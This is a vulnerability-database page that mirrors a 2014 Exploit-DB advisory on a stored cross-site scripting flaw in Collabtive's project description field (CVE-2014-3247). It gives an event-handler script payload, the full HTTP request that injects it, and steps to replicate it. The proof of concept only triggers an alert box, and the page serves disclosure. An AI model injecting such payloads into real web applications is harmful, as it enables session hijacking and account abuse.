Lucene search
K

Collabtive 1.2 - Persistent Cross-Site Scripting

🗓️ 08 May 2014 00:00:00Reported by Deepak RathoreType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 28 Views

Collabtive 1.2 - Stored Cross-Site Scripting (XSS) Vulnerability in "Add project" featur

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Collabtive 1.2 - Stored XSS Vulnerability
12 May 201400:00
zdt
Circl
CVE-2014-3247
8 May 201400:00
circl
CVE
CVE-2014-3247
15 May 201414:00
cve
Cvelist
CVE-2014-3247
15 May 201414:00
cvelist
EUVD
EUVD-2014-3261
7 Oct 202500:30
euvd
exploitpack
Collabtive 1.2 - Persistent Cross-Site Scripting
8 May 201400:00
exploitpack
NVD
CVE-2014-3247
15 May 201414:55
nvd
Prion
Cross site scripting
15 May 201414:55
prion
seebug.org
Collabtive 1.2 - Stored XSS
1 Jul 201400:00
seebug
UbuntuCve
CVE-2014-3247
15 May 201414:55
ubuntucve
Rows per page
Vulnerability title: Stored XSS vulnerability in Collabtive application
(CVE-2014-3247)
CVE: CVE-2014-3247(coordinated with cve assigning team and vendor)
Vendor: Collabtive
Product: Collabtive (Open Source Project Management Software)
Affected version: 1.12
Fixed version: 2.0
Reported by: Deepak Rathore
Severity: Critical
URL: http://[domain]/collabtive-12/admin.php?action=addpro
Affected Users: Authenticated users
Affected parameter(s): desc

Issue details: The value of the desc request parameter is copied into the
HTML document as plain text between tags. The payload 1c91c<img%20src%3da
%20onerror%3dalert(1) >cc245622da6 was submitted in the desc parameter.
This input was echoed as 1c91c<img src=a onerror=alert(1) >cc245622da6 in
the application's response.  This proof-of-concept attack demonstrates that
it is possible to inject arbitrary JavaScript into the application's
response. The proof-of-concept attack demonstrated uses an event handler to
introduce arbitrary JavaScript into the document.

HTTP request:
POST /collabtive-12/admin.php?action=addpro HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:28.0) Gecko/20100101
Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/collabtive-12/index.php?mode=login
Cookie: PHPSESSID=ri2sqmga763p7qav73enfv99p5
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
name=test&desc=test928a4<img%20src%3da%20onerror%3dalert(1)>a480a723950&neverdue=neverdue&budget=10&assignto%5B%5D=1&assignme=1

Steps to replicate:
1. Login into application
2. Go to "Desktop" tab and click on "Add project"
3. Fill the project details in the project form and click on "Add" button
4. Intercept request by interception proxy i.e. OWASP Zap, Burp Suite etc
5. Replace "desc" parameter value with "1c91c<img%20src%3da
%20onerror%3dalert(1) >cc245622da6"
6. Forward manipulated request to server and wait for response in browser
7. A popup with alert message will come that is the proof of vulnerability.

Tools used: Burp Suite proxy, Mozilla Firefox browser

Best Regards,
Deepak

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 May 2014 00:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 24.3
EPSS0.0133
28